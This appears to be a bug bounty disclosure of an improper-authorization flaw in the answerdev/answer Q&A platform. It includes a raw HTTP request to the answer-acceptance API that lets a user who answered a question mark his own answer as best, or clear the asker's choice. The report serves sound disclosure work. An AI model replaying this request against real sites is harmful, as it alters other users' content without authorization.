Improper Authorization lead a user can accept his answer as the best answer in answerdev/answer
Reported on
Apr 19th 2023
Description
Login as user A and make a question
https://meta.answer.dev/questions/D1C7/how-to-set-my-laptop-auto-start-at-particular-time
Login as User B and answer this
As normal, User A can vote the answer of User B is best answer But with this vuln, User B can call the api
POST https://meta.answer.dev/answer/api/v1/answer/acceptance HTTP/1.1 Host: meta.answer.dev Connection: keep-alive Content-Length: 41 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="99", "Google Chrome";v="99" Authorization: e25eda18-de4d-11ed-80b6-0242c0a89004 Content-Type: application/json Accept-Language: en_US sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://meta.answer.dev Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://meta.answer.dev/questions/D1C7/how-to-set-my-laptop-auto-start-at-particular-time
{"question_id":"D1C7","answer_id":"E1D7"}
So the answer of user B is marked as Best Answer
Also, with Post Request {"question_id":"D1C7","answer_id":"0"}
the User B can remove all the best answer that User A has voted
Proof of Concept
Impact
Unauthorize alter or remove Vote
